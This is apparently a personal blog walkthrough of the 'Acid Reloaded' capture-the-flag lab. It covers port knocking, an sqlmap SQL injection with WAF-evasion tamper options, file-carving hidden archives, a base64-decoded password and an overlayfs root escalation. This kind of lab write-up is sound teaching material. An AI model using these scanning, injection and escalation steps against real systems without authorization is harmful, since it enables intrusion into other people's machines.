Wednesday 3 February 2016

Acid reloaded challenge

Hi.
Today is time for Acid Reloaded challenge.
root@osboxes:~# nmap -sn 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:30 GMT
(..)
Nmap scan report for 192.168.1.102
Host is up (0.00071s latency).
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
(...)
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.67 seconds
Enumeration services ...
root@osboxes:~# nmap -sV -A 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:32 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00085s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=2/3%Time=56B1F361%P=i686-pc-linux-gnu%r(NULL,29
SF:,"SSH-2\.0-OpenSSH_6\.7p1\x20Ubuntu-5ubuntu1\.3\r\n");
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
Hmmm... Port 22 open only? This is a little strange...
root@osboxes:~# nmap -p- 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 12:35 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00054s latency).
Not shown: 65533 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
33447/tcp filtered unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.54 seconds
OK, let's try connect to port 22.

















Oh! We can see that out target implement "Port Knocking", let's knock the ports!
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 3 192.168.1.102
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:20 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00091s latency).
PORT  STATE  SERVICE
3/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)

root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 2 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00096s latency).
PORT  STATE  SERVICE
2/tcp closed compressnet
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 1 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.00099s latency).
PORT  STATE  SERVICE
1/tcp closed tcpmux
MAC Address: 00:0C:29:BB:6E:B3 (VMware)

root@osboxes:~# nmap -Pn --host_timeout 201 --max-retries 0  -p 33447 192.168.1.102

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 15:21 GMT
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
PORT      STATE SERVICE
33447/tcp open  unknown
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Amazing! Port 33447 is open! Good idea, will be check what kind of service is running on 33447 port.
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
We areable to browse the application via our browser



The default page is encouraging us to be creative :-) Let's execute dirbuster

bin directory looks interesting. We have response of http://192.168.1.102/bin request below.


As far as I know, this web form is resistant SQL Injection attack, so go deeper.

In our application /bin/dashboard.php looks promising.

Hmmm, let' go back to /bin/index.php and intercept traffic.


We can see that our credentials are validated in /bin/includes/validation.php. We have discovered also dashboard.php file, which is a page after validation. We have to force successful validation. Let's reload our dashboard.php and we will try deceive out application that we have been successfully authenticated.


And result:


Let's click on "Click" link. We have been redirected to 
http://192.168.1.105:33447/bin/l33t_haxor.php
We noticed that source code contains information that l33t_haxor.php uses id numeric parameter.
 My sqlmap attemptios is fail, but I want to try harder, because maybe the application implement WAF, so
sqlmap -u "http://192.168.1.105:33447/bin/l33t_haxor.php?id=1*%22" --dbms=mysql --threads=10 -p id --batch --tamper=space2comment,space2dash,space2hash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank

(...)

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
Excellent! Let's find some credentials (if exists)
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login
 Tables
Database: secure_login
[4 tables]
+--------------------+
| UB3R/strcpy.exe|
| login_attempts    |
| members             |
| word                    |
+--------------------+
 I didn't find any interesting information from secure_login database :( But UB3R/strcpy.exe looks a little strange. Let's examine
http://192.168.1.105:33447/UB3R/strcpy.exe
I have downloaded strcpy.exe file to my machine.
root@osboxes:~/Downloads# file strcpy.exe
strcpy.exe: PDF document, version 1.5
We are happy, because



This file contains only this image? I don't believe that, we should examine the file deeper
root@osboxes:~/Downloads# strings strcpy.pdf

(...)

acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg

(...)
OK, at least we know that we are at right track :-)
root@osboxes:~/Downloads# mv strcpy.pdf strcpy.rar
root@osboxes:~/Downloads# unrar e strcpy.rar

UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal

Extracting from strcpy.rar

Extracting  acid.txt                                                  OK
Extracting  lol.jpg                                                   OK
All OK
And
root@osboxes:~/Downloads# cat acid.txt
You are at right track.

Don't loose hope..

Good Luck :-)

Kind & Best Regards,
 Maybe lol.jpg will be helpful

Hmmm, maybe something useful is hardcodened on the picture.
root@osboxes:~/Downloads# strings lol.jpg

(...)

hint.txt
`You have found a contact. Now, go and grab the details :-)
So, let's try similar technique like with our PDF file.
root@osboxes:~/Downloads# mv lol.jpg lol.rar
root@osboxes:~/Downloads# unrar e lol.rar

UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal

Extracting from lol.rar

Extracting  Avinash.contact                                           OK
Extracting  hint.txt                                                  OK
All OK

root@osboxes:~/Downloads# cat hint.txt
You have found a contact. Now, go and grab the details :-)

root@osboxes:~/Downloads# cat Avinash.contact
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
    <c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate><c:Extended><MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</MSWABMAPI:PropTag0x3A58101F></c:Extended>
    <c:ContactIDCollection><c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e"><c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value></c:ContactID></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e"><c:Type>SMTP</c:Type><c:Address>acid.exploit@gmail.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/></c:EmailAddressCollection><c:NameCollection><c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2"><c:FormattedName>Avinash</c:FormattedName><c:GivenName>Avinash</c:GivenName></c:Name></c:NameCollection><c:PersonCollection><c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134"><c:FormattedName>Makke</c:FormattedName><c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection></c:Person></c:PersonCollection><c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>
The string AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= looks like somethong encoded via base64. Let's try decode
root@osboxes:~/Downloads# echo "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=" | base64 -d
This command gives us something like NooB@123. This string may be a password and Avinash and Makke may be a username.
Unfortunately Avinash with NooB@123 is not a valid credential. So let's try makke and voila!

 We have got
makke@acid:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint
clear
cd /bin/
ls
./overlayfs
clear
wgt
wget
apt-get remove wget
su
su -
exit
Let's mmove our location to /bin/ and....


Wow, we have got root! This was not as hard as I though :-)


at